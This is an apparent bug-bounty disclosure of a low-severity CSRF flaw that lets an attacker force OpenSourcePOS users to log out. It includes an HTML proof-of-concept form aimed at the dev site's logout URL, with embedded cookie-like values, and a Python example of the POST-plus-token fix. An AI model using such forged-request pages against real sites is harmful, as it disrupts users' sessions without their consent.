Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on Dec 23rd 2021


Description

CSRF on the logout functionality. An attacker can log the user out by getting them to open a malicious link, since the logout endpoint accepts a plain GET request with no CSRF token.

Proof of Concept

<!DOCTYPE html>
<html>
<body>
<!-- Attacker-hosted page: submitting this form sends a cross-site GET to the logout endpoint.
     The victim's browser attaches its own session cookies automatically; the text inputs
     below only become query-string parameters and are not required for the request to succeed. -->
<form method="GET" action="https://dev.opensourcepos.org:443/home/logout">
    <input type="text" name="csrf_cookie_ospos_v3" value="b733af2ee56ba0678b8817af620a02d9">
    <input type="text" name="ospos_session" value="0ba22e9026f4c7c24749ebab3dc6ccea38acd43f">
    <input type="submit" value="Send">
</form>
</body>
</html>

Impact

This vulnerability allows an attacker to end the user's session (forced logout).

Note

This is not an attack as such; it is a kind of annoyance to the user, though it is a valid CSRF. Using the POST method plus a CSRF token would avoid this.
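An added illustration of the fix the note recommends, not OpenSourcePOS's own code (the project is PHP on CodeIgniter): a framework-neutral Python logout handler in its GET-accepting form beside a hardened form that requires POST and a per-session synchronizer token. The function names, the `csrf_token` field name and the dict-based session are assumptions made for this example; the sample session is constructed inline.

```python
import hmac
import secrets

CSRF_FIELD = "csrf_token"  # form field name, assumed for this example


def new_session(user="alice"):
    """Server-side session as a plain dict (constructed sample; a real app keeps it in a store).
    A fresh random token is minted at login and only ever rendered into same-origin pages."""
    return {"user": user, CSRF_FIELD: secrets.token_hex(16)}


def logout_vulnerable(method, session, form):
    """Before: any request that carries the victim's session cookie ends the session.
    A cross-site <form method="GET" action="/home/logout"> or a plain <img src="..."> triggers
    it, because the browser attaches the victim's cookies automatically."""
    session.clear()
    return 302  # redirect to the login page


def logout_hardened(method, session, form):
    """After: POST only, and the submitted token must match the one bound to the session.
    An attacker's page can make the victim's browser send the request, but it cannot read the
    token out of the victim's session or pages, so it cannot build a valid body."""
    if method != "POST":
        return 405  # method not allowed: the PoC's GET form stops here
    expected = session.get(CSRF_FIELD)
    supplied = form.get(CSRF_FIELD, "")
    # Constant-time comparison; a session with no token at all is rejected as well.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403
    session.clear()
    return 302


def render_logout_form(session):
    """The legitimate logout control embeds the session's token as a hidden field."""
    return (
        '<form method="POST" action="/home/logout">'
        f'<input type="hidden" name="{CSRF_FIELD}" value="{session[CSRF_FIELD]}">'
        '<input type="submit" value="Log out"></form>'
    )


def replay_attack_page(handler, session):
    """Simulate the attacker's page from the report: a cross-site GET with no token.
    Returns (status, user_still_logged_in)."""
    status = handler("GET", session, {})
    return status, "user" in session


if __name__ == "__main__":
    s = new_session()
    print("vulnerable:", replay_attack_page(logout_vulnerable, s))  # (302, False)
    s = new_session()
    print("hardened:  ", replay_attack_page(logout_hardened, s))    # (405, True)
    print(render_logout_form(s))
```

Note that a `SameSite=Lax` session cookie does not close this particular hole on its own: Lax cookies are still sent on cross-site top-level GET navigations, which is exactly what the PoC's GET form produces. Requiring POST plus a token (or `SameSite=Strict`) removes that path.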

We are processing your report and will contact the opensourcepos team within 24 hours. a month ago
We have contacted a member of the opensourcepos team and are waiting to hear back a month ago
We have sent a follow up to the opensourcepos team. We will try again in 7 days. a month ago
jekkos validated this vulnerability a month ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos (Maintainer), a month ago:
I think this one is rather low severity; maybe some kind of DoS attack could be tricked this way, which could be annoying for a user. But besides that the impact is rather low.

jekkos confirmed that a fix has been merged on 9332d1 a month ago
jekkos has been awarded the fix bounty